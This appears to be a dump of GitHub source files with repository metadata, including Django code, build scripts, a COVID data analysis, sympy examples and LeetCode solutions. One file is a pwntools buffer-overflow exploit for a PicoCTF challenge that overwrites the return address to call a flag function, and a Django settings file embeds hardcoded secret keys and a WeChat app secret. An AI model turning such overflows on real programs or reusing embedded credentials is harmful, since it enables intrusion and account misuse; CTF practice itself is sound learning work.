migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ShortStory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500)),
('status', models.CharField(choices=[('dr', 'Draft'), ('p', 'Published'), ('b', 'Banned'), ('de', 'Deleted')], max_length=1)),
('publication_date', models.DateField()),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
b07f6888353b55adccdd583944efb91ff439f5f5
|
676acab8ff535019faff7da3afb8eecc3fa127f5
|
/target/pixhawk/fmu-v2/SConscript
|
308c9dcb859676580241ec094f1ec6e7087e31d0
|
[
"Apache-2.0"
] |
permissive
|
Firmament-Autopilot/FMT-Firmware
|
f8c324577245bd7e91af436954b4ce9421acbb41
|
0212fe89820376bfbedaded519552f6b011a7b8a
|
refs/heads/master
| 2023-09-01T11:37:46.194145
| 2023-08-29T06:33:10
| 2023-08-29T06:33:10
| 402,557,689
| 351
| 143
|
Apache-2.0
| 2023-09-12T05:28:39
| 2021-09-02T20:42:56
|
C
|
UTF-8
|
Python
| false
| false
| 275
|
import os
from building import *
cwd = GetCurrentDir()
objs = []
list = os.listdir(cwd)
for d in list:
path = os.path.join(cwd, d)
if os.path.isfile(os.path.join(path, 'SConscript')):
objs = objs + SConscript(os.path.join(d, 'SConscript'))
Return('objs')
|
[
"jiachi.zou@gmail.com"
] |
jiachi.zou@gmail.com
|
|
d363aeeb63a3262fdaff076630ab474b56876fe3
|
71626ba3dd283a0e11901d6df87f1e52c9f9cfc9
|
/overflow2/exploit.py
|
2377e0a5d8aa0a452d2adffb2b241aaf17035ffd
|
[] |
no_license
|
not-duckie/PicoCTF
|
fd26e1c5b1ba695d942962e28473344a8e1ba4fa
|
1d642511d0f016234dfea105a1bf19b7341aa3e8
|
refs/heads/master
| 2020-11-29T00:49:06.987049
| 2020-01-04T06:35:10
| 2020-01-04T06:35:10
| 229,966,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
#!/usr/bin/env python2
from pwn import *
p = process('./vuln')
rop = ROP('./vuln')
padding = "A"*188
flag = 0x080485e6
main = 0x080486b5
arg1 = 0xDEADBEEF
arg2 = 0xC0DED00D
#rop.call(0x080485e6, [0xDEADBEEF, 0xC0DED00D])
payload = padding + p32(flag) + 'ABCD' + p32(arg1) + p32(arg2)
p.recvuntil(':')
p.sendline(payload)
p.interactive()
|
[
"sarthakmisraa@gmail.com"
] |
sarthakmisraa@gmail.com
|
15c088ce58b087c604e61d3e01ed76d7b68636b0
|
b18fc146fd7e9cc5e7b511418a06c7b57e4ca797
|
/Client.py
|
7cca7993b35f79af11c732bd8cffb2f40edfe203
|
[] |
no_license
|
Stmuslimah/IndividualProject_Client
|
d7756087bfd812946d0e64a8e4c2d50f8ee6f9c9
|
78ef0114e6d7400f0ed903a861d039abd732b5e5
|
refs/heads/main
| 2023-05-14T05:21:43.625617
| 2021-06-06T06:07:58
| 2021-06-06T06:07:58
| 374,281,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
import socket
import time
c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
host = '192.168.56.103'
port = 8888
c.connect((host,port))
print('\n***_DOMAIN NAME RESOLVER APPLICATION_***\n')
file = open('Details.txt','w')
while True:
msg = input('\nEnter a Domain / details / \'end\' to exit: ')
c.sendto(msg.encode('utf-8'),(host,port))
if msg == "end":
print('\nConnection ended...')
False
time.sleep(1)
break
if msg != 'details' and msg != '':
data, addr = c.recvfrom(1024)
if data.decode('utf-8') != 'Not a proper domain':
print('Resolve to : ', data.decode('utf-8'))
file.write(msg + ' resolve to ' + data.decode('utf-8') + '\n')
else:
print(data.decode('utf-8'))
elif msg == 'details':
print('\n*****Previous Details*****')
file = open('Details.txt','r')
print(file.read())
file = open('Details.txt','a')
file.close()
c.close()
|
[
"muslimahaisyah39@gmail.com"
] |
muslimahaisyah39@gmail.com
|
882fd3432f04d71fdf073898a62bbc1c477f22b9
|
7bf6dabe69350a27f64c09e6eab1b4a51e2c9283
|
/covid_analysis_state_gender.py
|
f20cb8ece2f2adf272f376f0ac6e13663af99665
|
[] |
no_license
|
JoaquinTripp/covid_analysis
|
51bd8cb9445d69e0313cab1668f050b7fedd5a62
|
37c902469177e8106f572438e25e17abcdf5179b
|
refs/heads/master
| 2022-12-13T12:15:44.731260
| 2020-09-12T03:59:39
| 2020-09-12T03:59:39
| 294,858,918
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,135
|
py
|
"""Amphora Health:
Challenge code.
Author: Joaquin Tripp Gudiรฑo
Date: September 11, 2020.
This is a correlation analysis, searching for the factors associated with
ICU (Intensive Care Unity) usage by state,
in the people infected with Covid-19 in Mexico.
The Covid-19 is the infectious disease caused by the most recently discovered
coronavirus. On March 11 of 2020,the World Health Organization declared the
virus COVID-19 a Pandemic. Currently, on September 2020, there are more than
27,000,000 of people infected around the world. In Mexico, there are almost
650,000 and it ranks number 4 in deaths.
The informtaion used in this analysis, was taken from Mexico's ministry of
health website:
https://www.gob.mx/salud/documentos/datos-abiertos-152127,
"""
#Librarys used
import pandas as pd
import csv
import matplotlib.pyplot as plt
#Import the data
data = pd.read_csv('200909COVID19MEXICO.csv',encoding='windows-1252')
"""This is a correlation analysis about the people with COVID in ICU,therefore,
we need to filtered the information to exclude the negative cases and only use
the positives
"""
#Filtering the information about infected people
data_uci = data[data['RESULTADO'] == 1]
print(f'\n--------The Data has been filtered up-----------')
"""It is neccessary to clean up the data, because in some cases, there is no register
about if patient had or had not the disease, then are resgistered with 97, 98
and 99. It may causes lags.
The correlation analysis will be gruped by state (I have took the state
of residence from the COVID database), and others groups wil be considered too, like
the age and gender.
"""
#List of the factors in the database that will be used
factors = ['NEUMONIA','DIABETES','EPOC','ASMA','INMUSUPR','HIPERTENSION',
'CARDIOVASCULAR','OBESIDAD',
'RENAL_CRONICA','TABAQUISMO']
#Variables for the histogram
age = []
uci_cases = []
uci_cases_per = []
total_uci_cases = data_uci['UCI'][data_uci['UCI'] == 1].count()
#The number of UCI cases by age. The 90% of the cases are betweem the 25 and 80 years old.
for n in range(0,110):
new_cases = data_uci['EDAD'][data_uci['EDAD'] == n][data_uci['UCI'] == 1].count()
new_cases_per = new_cases/total_uci_cases
age.append(n)
uci_cases.append(new_cases)
#print(f'Age {n}:{new_cases} : {new_cases_per*100}%')
input(f'\nEnter to continue: ')
#The list of the states
states = ['AGUASCALIENTES','BAJA CALIFORNIA','BAJA CALIFORNIA SUR','CAMPECHE',
'COAHUILA DE ZARAGOZA','COLIMA','CHIAPAS','CHIHUAHUA','CIUDAD DE MรXICO','DURANGO',
'GUANAJUATO','GUERRERO','HIDALGO','JALISCO','MรXICO','MICHOACรN DE OCAMPO','MORELOS',
'NAYARIT','NUEVO LEรN','OAXACA','PUEBLA','QUERรTARO','QUINTANA ROO','SAN LUIS POTOSร',
'SINALOA','SONORA','TABASCO','TAMAULIPAS','TLAXCALA','VERACRUZ','YUCATรN','ZACATECAS']
#Genders key list
genders = ['Female','Male']
#This function runs the correlation between the infected people with UIC vs the infected people
# with each disease given in the parameter name_2, grouped by date.
def corr_data(name_1,name_2):
#Count the number of positive cases
group_x = data_uci.groupby(['FECHA_INGRESO'])[[name_1]].apply(lambda x: x[ x == 1].count())
group_y = data_uci.groupby(['FECHA_INGRESO'])[[name_2]].apply(lambda x: x[ x == 1].count())
#Define the two list to compare
x = group_x[name_1]
y = group_y[name_2]
#Correlation method application
coef = x.corr(y,method='pearson')
#if x.count() == y.count():
#print(f'There are {x.count()} people with UCI')
#else:
#print('UPS! something went wrong')
return coef
#Variables to get the disease and the UCI cases by day
value_x = []
value_y = []
#A dictionary to save the correaltion for each disease
disease_corr = {}
#Create a new file to save the correlations for each disease by state
outfile = open('results_by_state_gender.csv', 'w')
print(f'STATE,GENDER,NEUMONIA,DIABETES,EPOC,ASMA,INMUSUPR,HIPERTENSION,CARDIOVASCULAR,OBESIDAD,RENAL_CRONICA,TABAQUISMO', file = outfile)
#Run the code for the 32 states
for state in range(1,33):
print(f'\n---------------------------{states[state-1]}------------------------')
print(f'\nIn {states[state-1]}')
#By gender
for gender in range(1,3):
data_uci = data[data['ENTIDAD_RES'] == state][data['RESULTADO'] == 1 ][data['SEXO'] == gender]
counter = 0
#by disease
for item in factors:
counter += 1
#Define the UCI cases and the disease cases to correlate
value_x = 'UCI'
value_y = item
#Correlation method
run = corr_data(name_1 = value_x, name_2 = value_y)
#dic = {f'UCI vs {item}' : run}
#print(f'{counter} corrida: {value_x} vs {value_y}\nScore = {run}')
#Dictionary of disease correlations
disease_corr[item] = run
#for item, key in disease_corr.items():
#print(f'UCI vs {item} : {key}')
#Max correlation founded
max_corr = max(disease_corr.values())
#define the disease variable to print it on the outfile
disease = []
for item, score in disease_corr.items():
if score == max_corr:
disease = item
#Print the max correaltion by gender for each state
print(f'\t>>> The max correlation is {max_corr} by {disease} disease in {genders[gender-1]}.')
#Print the information about all correlations by state, gender and disease, on the outfile
print(f'{states[state-1]},{genders[gender-1]},{disease_corr["NEUMONIA"]},{disease_corr["DIABETES"]},{disease_corr["EPOC"]},{disease_corr["ASMA"]},{disease_corr["INMUSUPR"]},{disease_corr["HIPERTENSION"]},{disease_corr["CARDIOVASCULAR"]},{disease_corr["OBESIDAD"]},{disease_corr["RENAL_CRONICA"]},{disease_corr["TABAQUISMO"]}', file = outfile)
#Refresh the outfile
outfile.flush()
print(f'---------The process has finished-----------')
final_file = pd.read_csv('results_by_state_gender.csv', encoding = 'windows-1252')
print(f'Information description{final_file.describe()}')
|
[
"joaquintripp@gmail.com"
] |
joaquintripp@gmail.com
|
63f331aa35178b96b3b7a5bff53d76affbd12d84
|
687a57837c2ce1ec366ce05d1a3a3a113552137e
|
/src/neurounits/unit_term_parsing/__init__.py
|
a794123e054901c0ba4e9d7778810a3f939fb2b4
|
[] |
no_license
|
mikehulluk/NeuroUnits
|
ba9974897b2a1807010fdcd141eac7503ba09766
|
ee59a8f7dcce382cb28a0f87b56952e0b7c59f17
|
refs/heads/master
| 2020-04-05T08:07:13.422241
| 2013-07-29T09:06:06
| 2013-07-29T09:06:06
| 2,848,923
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,555
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -------------------------------------------------------------------------------
from .unitterm_parsing import parse_term
|
[
"mikehulluk@googlemail.com"
] |
mikehulluk@googlemail.com
|
d7ccf67ffe0981f04b86d9ad04297b26a1605383
|
2bef61d763ee448d651d72162e7538ade709d6d5
|
/blog/urls.py
|
fcaf8fb99b306cf8e56545aa1242b947b04f5d5a
|
[] |
no_license
|
devsatrio/lancarjaya
|
ac4163998c2693aa03f22ef0866321f674122b64
|
7c1a0734ee0014a6533e941c3b0c5f222d7756b9
|
refs/heads/master
| 2020-12-19T10:45:59.458972
| 2020-02-20T02:03:06
| 2020-02-20T02:03:06
| 235,710,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
from django.urls import path
from . import views
app_name='blog'
urlpatterns = [
path('kategori/<int:kategori>',views.bykategori,name='kategori'),
path('<slug:blogslug>',views.show,name='show'),
path('',views.index,name='index'),
]
|
[
"50070374+zicom99@users.noreply.github.com"
] |
50070374+zicom99@users.noreply.github.com
|
036d74224f28eb6fba178a7111ac0131c3ce7cd4
|
a426a2de6c1bf2c991d3a1c10cac16b794bf41c2
|
/Graph/lib/GraphSearch/island_problem.py
|
63889a2f271695eb8e5104538aee760a675c7099
|
[] |
no_license
|
lvamaral/RubyAlgorithms
|
8643e7c2996adaad50bff6174e8e81b58b918492
|
81a50d96807b7eef02c67985e45acf404bcc156b
|
refs/heads/master
| 2021-01-01T19:23:39.513409
| 2017-11-13T23:28:06
| 2017-11-13T23:28:06
| 98,580,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,432
|
py
|
class Node:
def __init__(self, value):
if value == 1:
self.filled = True
else:
self.filled = False
self.seen = False
class Graph:
def __init__(self, grid):
self.grid = grid
self.row_n = len(grid)
self.col_n = len(grid[0])
self.count = 0
self.max_count = 0
self.graph = {}
def getBiggestRegion(self):
for row in range(self.row_n):
for col in range(self.col_n):
cell = Node(self.grid[row][col])
self.graph[(row,col)] = cell
#now iterate over all cells unseen and see if any gets a bigger max_count
for row in range(self.row_n):
for col in range(self.col_n):
if not self.graph[(row,col)].seen:
self.DFS(self.graph[(row,col)], (row,col))
if self.count > self.max_count:
self.max_count = self.count
self.count = 0
print(self.max_count)
def DFS(self, node, pos):
x = pos[0]
y = pos[1]
node.seen = True
if node.filled:
self.count += 1
for i in [-1,0,1]:
for j in [-1,0,1]:
if (x+i, y+j) in self.graph:
cell = self.graph[(x+i, y+j)]
if not cell.seen:
self.DFS(cell, (x+i, y+j))
|
[
"lucas.v.amaral@gmail.com"
] |
lucas.v.amaral@gmail.com
|
34b5f9e260cc2fb420987d806f362d71e1057274
|
0c8801e1acb6909ee1f0a69b6a4a0ddb013b9c2d
|
/c13.py
|
ffeff028a7656e62e88ebd426c9671668e0c3838
|
[
"MIT"
] |
permissive
|
bobbydurrett/sympytutorial
|
99ed04ad96cc505779d88d966744ef6470c50767
|
071b2f0de8b6934556ab1e48d180e424bcbd7345
|
refs/heads/main
| 2023-04-09T06:34:51.185799
| 2021-04-23T23:49:54
| 2021-04-23T23:49:54
| 356,042,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,788
|
py
|
# https://docs.sympy.org/latest/tutorial/manipulation.html
from sympy import *
init_printing(use_unicode=False)
from myprint import spprint
x, y, z = symbols('x y z')
expr = x**2 + x*y
print(srepr(expr))
x = symbols('x')
print(srepr(x))
x = Symbol('x')
print(srepr(x))
print(srepr(x**2))
print(' ')
spprint(Pow(x, 2))
print(type(2))
print(type(sympify(2)))
print(srepr(x*y))
print(' ')
spprint(Mul(x, y))
spprint(Add(Pow(x, 2), Mul(x, y)))
expr = sin(x*y)/2 - x**2 + 1/y
spprint(expr)
print(srepr(expr))
# no subtraction (very weird)
print(srepr(x - y))
# no division (ditto)
expr = x/y
spprint(expr)
print(srepr(expr))
# rational number
expr = sin(x*y)/2
spprint(expr)
print(srepr(expr))
# order
spprint(1 + x)
# func
expr = Add(x, x)
print(expr.func)
spprint(expr)
print(Integer(2).func)
print(Integer(0).func)
print(Integer(-1).func)
print(isinstance(Integer(2),Integer))
print(isinstance(Integer(0),Integer))
print(isinstance(Integer(-1),Integer))
# args
expr = 3*y**2*x
print(expr.func)
print(expr.args)
# reconstruct from func and args
spprint(expr.func(*expr.args))
print(expr == expr.func(*expr.args))
# args are sorted
expr = y**2*3*x
spprint(expr)
print(expr.args)
# can index
print(' ')
spprint(expr.args[2])
print(expr.args[2].args)
print(y.args)
print(Integer(2).args)
print(type(Integer(2).args))
def pre(expr):
print(expr)
for arg in expr.args:
pre(arg)
expr = x*y + 1
spprint(expr)
pre(expr)
# built in
for arg in preorder_traversal(expr):
print(arg)
from sympy import Add
from sympy.abc import x, y, z
spprint(x + x)
spprint(Add(x, x))
spprint(Add(x, x, evaluate=False))
from sympy import sympify
spprint(sympify("x + x", evaluate=False))
# evaluate False doesnt prevent later evaluation
expr = Add(x, x, evaluate=False)
spprint(expr)
spprint(expr + x)
# unevaluated expression
from sympy import UnevaluatedExpr
expr = x + UnevaluatedExpr(x)
spprint(expr)
spprint(x + expr)
# doit forces evaluation
spprint((x + expr).doit())
#other
from sympy import *
from sympy.abc import x, y, z
uexpr = UnevaluatedExpr(S.One*5/7)*UnevaluatedExpr(S.One*3/4)
spprint(uexpr)
spprint(x*UnevaluatedExpr(1/x))
# x + x gets evaluated before being passed to
# UnevaluatedExpr
expr1 = UnevaluatedExpr(x + x)
spprint(expr1)
# but 'x + x' is just a string
# so it is not evaluated before sympify gets it
expr2 = sympify('x + x', evaluate=False)
spprint(expr2)
# sympify keeps x + x from being evaluated on way in
# UnevaluatedExpr keeps x + x from being evaluated when adding y
spprint(UnevaluatedExpr(sympify("x + x", evaluate=False)) + y)
# latex
from sympy import latex
uexpr = UnevaluatedExpr(S.One*5/7)*UnevaluatedExpr(S.One*3/4)
print(latex(uexpr))
print(latex(uexpr.doit()))
|
[
"bobby@bobbydurrettdba.com"
] |
bobby@bobbydurrettdba.com
|
c6672d7dd3e2446b3f16cf09954a42762c8fceef
|
88b7c57a0d9a7a3b28ebd9d6c12ecbbebc50e8a5
|
/config/settings/dev.py
|
fb7a3dc769830e8f5120adf3b2bf7efddccd22d8
|
[] |
no_license
|
largerbigsuper/beep
|
71438a4c2feae1afd6ecd25899e95f441bf2165b
|
a5d84437d79f065cec168f68210c4344a60d08d1
|
refs/heads/master
| 2022-09-23T02:09:37.117676
| 2020-01-03T06:21:57
| 2020-01-03T06:21:57
| 209,052,138
| 0
| 0
| null | 2022-09-13T23:03:25
| 2019-09-17T12:47:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,456
|
py
|
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env(
"DJANGO_SECRET_KEY",
default="1ReGaeINNTOIuHNczpQnKUf51jXoc7ZbELmcmgEJM5cun2L31vbVXfrQKPVimrLN",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
# DATABASES = {"default": env.db("DATABASE_URL")}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': env('DB_NAME'),
'USER': env('DB_USER'),
'PASSWORD':env('DB_PASSWORD'),
'HOST': env('DB_HOST'),
'PORT': env('DB_PORT'),
'ATOMIC_REQUESTS': True,
'CONN_MAX_AGE': 10,
'OPTIONS': {
'init_command': 'SET CHARACTER SET utf8mb4',
'charset': 'utf8mb4',
}
}
}
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://redis:6379/1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
SESSION_COOKIE_AGE = 365 * 24 * 60 * 60
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env(
"DJANGO_EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend"
)
# django-debug-toolbar
# ------------------------------------------------------------------------------
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites
INSTALLED_APPS += ["debug_toolbar"] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware
MIDDLEWARE += ["debug_toolbar.middleware.DebugToolbarMiddleware"] # noqa F405
# https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config
DEBUG_TOOLBAR_CONFIG = {
"DISABLE_PANELS": ["debug_toolbar.panels.redirects.RedirectsPanel"],
"SHOW_TEMPLATE_CONTEXT": True,
}
# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips
# INTERNAL_IPS = ["127.0.0.1", "10.0.2.2"]
# if env("USE_DOCKER") == "yes":
# import socket
# hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())
# INTERNAL_IPS += [ip[:-1] + "1" for ip in ips]
# django-extensions
# ------------------------------------------------------------------------------
# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration
INSTALLED_APPS += ["django_extensions"] # noqa F405
# Your stuff...
# ------------------------------------------------------------------------------
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SECURE_SSL_REDIRECT = False
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
CSRF_TRUSTED_ORIGINS = ['servicewechat.com', 'lhxq.top', 'beep.lhxq.top', 'test.beepcrypto.com', '127.0.0.1', '127.0.0.1:8080', '127.0.0.1:7788', '192.168.0.102:7788']
# ๅฐ็จๅบ
MINI_PRAGRAM_APP_ID = 'wx300f2f1d32b30613'
MINI_PRAGRAM_APP_SECRET = '2d6b9fef49827381af8dd26b4b66f5e5'
MINI_PRAGRAM_LOGIN_URL = 'https://api.weixin.qq.com/sns/jscode2session?appid={}&secret={}&grant_type=authorization_code&js_code='.format(MINI_PRAGRAM_APP_ID, MINI_PRAGRAM_APP_SECRET)
CHANNEL_LAYERS = {
'default': {
'BACKEND': 'channels_redis.core.RedisChannelLayer',
'CONFIG': {
"hosts": ['redis://redis:6379/0'],
},
},
}
CELERY_BROKER_URL = 'redis://redis:6379/2' # Broker้
็ฝฎ๏ผไฝฟ็จRedisไฝไธบๆถๆฏไธญ้ดไปถ
CELERY_RESULT_BACKEND = 'redis://redis:6379/2' # BACKEND้
็ฝฎ๏ผ่ฟ้ไฝฟ็จredis
CELERY_RESULT_SERIALIZER = 'json' # ็ปๆๅบๅๅๆนๆก
CELERY_TIMEZONE = "Asia/Shanghai"
CELERY_ENABLE_UTC = False
|
[
"zaihuazhao@163.com"
] |
zaihuazhao@163.com
|
884e1f63d9339161e149eeadb442024f17746da7
|
02cbfdbf5f36e073b48aebb5d78e77b86ecab143
|
/2.3.4.py
|
374beaa0d1b1f5c1fd8819a2a640ee5ead6b0616
|
[] |
no_license
|
afdRinQ/auto-tests-course
|
a5c22e3f23a76d06494d757e0834207934b5a9ec
|
8697941277d6590b6bcce31535c0e634427c71b5
|
refs/heads/main
| 2023-07-11T15:28:04.835611
| 2021-09-12T11:23:05
| 2021-09-12T11:23:05
| 405,616,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 871
|
py
|
from selenium import webdriver
import time
import math
def calc(x):
return str(math.log(abs(12 * math.sin(int(x)))))
link = "http://suninjuly.github.io/alert_redirect.html?l"
try:
browser = webdriver.Chrome()
browser.get(link)
button1 = browser.find_element_by_css_selector("button.btn")
button1.click()
confirm = browser.switch_to.alert
confirm.accept()
time.sleep(3)
x_element = browser.find_element_by_id("input_value")
x = x_element.text
y = calc(x)
input1 = browser.find_element_by_id("answer")
input1.send_keys(y)
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# ััะฟะตะฒะฐะตะผ ัะบะพะฟะธัะพะฒะฐัั ะบะพะด ะทะฐ 30 ัะตะบัะฝะด
time.sleep(10)
# ะทะฐะบััะฒะฐะตะผ ะฑัะฐัะทะตั ะฟะพัะปะต ะฒัะตั
ะผะฐะฝะธะฟัะปััะธะน
browser.quit()
|
[
"RinQ86@gmail.com"
] |
RinQ86@gmail.com
|
c7dc591c085c21ed5bdbf2b6023f721f349dd348
|
36e1c37b4af7685840e145a3b444c2417d246438
|
/mq/monitor/api_ping_check.py
|
136075237e36d98942919561d0a08cb7eaf31e17
|
[] |
no_license
|
lynndotconfig/python-analysis
|
0850fa87cfbb5a295970ad3eebb2759371a469bf
|
dcfb4d139bc8df0e41a979fa6d9b89a6184ef786
|
refs/heads/master
| 2021-01-13T16:40:03.063075
| 2018-04-04T09:53:03
| 2018-04-04T09:53:03
| 78,192,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,176
|
py
|
"""RabbitMQ vhost aliveness check."""
import base64
import httplib
import urllib
import socket
import sys
EXIT_OK = 0
EXIT_WARNING = 1
EXIT_CRITICAL = 2
EXIT_UNKOWN = 3
def main():
"""CHECK CONNECTION."""
server, port = sys.argv[1].split[":"]
vhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
conn = httplib.HTTPConnection(server, port)
path = '/api/aliveness-test/%s' % urllib.quote(vhost, safe='')
method = 'GET'
credentials = base64.b64encode("%s:%s" %(username, password))
try:
conn.request(
method,
path,
"",
{
"Content-Type": "application/json",
"Authorization": "Basic " + credentials
}
)
except socket.error:
print "CRITICAL: Could not connect to %s:%s" %(server, port)
sys.exit(EXIT_CRITICAL)
response = conn.getresponse()
if response.status > 299:
print "CRITICAL: Broker not alive: %s" % response.read()
sys.exit(EXIT_CRITICAL)
print "OK: Connect to %s:%s sucessfully" %(server, port)
sys.exit(EXIT_OK)
if __name__ == '__main__':
main()
|
[
"lynn.config@gmail.com"
] |
lynn.config@gmail.com
|
7682a21f925f9cf50ba7ae3728c38a11dacdb942
|
6ffbdd335ac5083ba5bdd0bd41c105f9c408682c
|
/src/django_react/urls.py
|
882aaa0a34106f05075280eb8a65e2b854c91c7b
|
[] |
no_license
|
BettinaBurri/spielwiese_bbu
|
2a6025447152da6c52a7959d750737cc25b01213
|
3c3d8fa4346f8d295fcb8e312d0dc27a588ef81f
|
refs/heads/main
| 2023-01-02T04:50:07.161672
| 2020-10-09T11:49:13
| 2020-10-09T11:49:13
| 302,352,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 840
|
py
|
"""django_react URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('leads.urls')),
path('', include('frontend.urls')),
]
|
[
"burri.bettina@gmail.com"
] |
burri.bettina@gmail.com
|
43c114108be58675f3315ffc4f23538067730145
|
15581a76b36eab6062e71d4e5641cdfaf768b697
|
/LeetCode_30days_challenge/2021/August/Set Matrix Zeroes.py
|
51c881a0fe2ad8b202fa896fd86dffc76c4635b2
|
[] |
no_license
|
MarianDanaila/Competitive-Programming
|
dd61298cc02ca3556ebc3394e8d635b57f58b4d2
|
3c5a662e931a5aa1934fba74b249bce65a5d75e2
|
refs/heads/master
| 2023-05-25T20:03:18.468713
| 2023-05-16T21:45:08
| 2023-05-16T21:45:08
| 254,296,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,805
|
py
|
from typing import List
# Approach 1 with O(M + N) extra memory
class Solution:
def setZeroes(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
rows = set()
cols = set()
n = len(matrix)
m = len(matrix[0])
for i in range(n):
for j in range(m):
if matrix[i][j] == 0:
rows.add(i)
cols.add(j)
for row in rows:
for col in range(m):
matrix[row][col] = 0
for col in cols:
for row in range(n):
matrix[row][col] = 0
# Approach 2 with O(1) extra memory
class Solution:
def setZeroes(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
n = len(matrix)
m = len(matrix[0])
first_row = first_col = False
for i in range(n):
for j in range(m):
if matrix[i][j] == 0:
if i == 0:
first_row = True
if j == 0:
first_col = True
matrix[0][j] = matrix[i][0] = 2 ** 31
for row in range(1, n):
if matrix[row][0] == 2 ** 31:
for col in range(m):
matrix[row][col] = 0
for col in range(1, m):
if matrix[0][col] == 2 ** 31:
for row in range(n):
matrix[row][col] = 0
if matrix[0][0] == 2 ** 31:
if first_row:
for col in range(m):
matrix[0][col] = 0
if first_col:
for row in range(n):
matrix[row][0] = 0
|
[
"mariandanaila01@gmail.com"
] |
mariandanaila01@gmail.com
|
82a1d4a6d1260f47e4cd6b966110c9fd65ca757c
|
1fa6c2650c791e35feaf57b87e832613e98797dd
|
/LeetCode/DS - Heap/M K Closest Points to Origin.py
|
2659259e57c56c802f5c7355b47c50a2a063b30e
|
[] |
no_license
|
hz336/Algorithm
|
415a37313a068478225ca9dd1f6d85656630f09a
|
0d2d956d498742820ab39e1afe965425bfc8188f
|
refs/heads/master
| 2021-06-17T05:24:17.030402
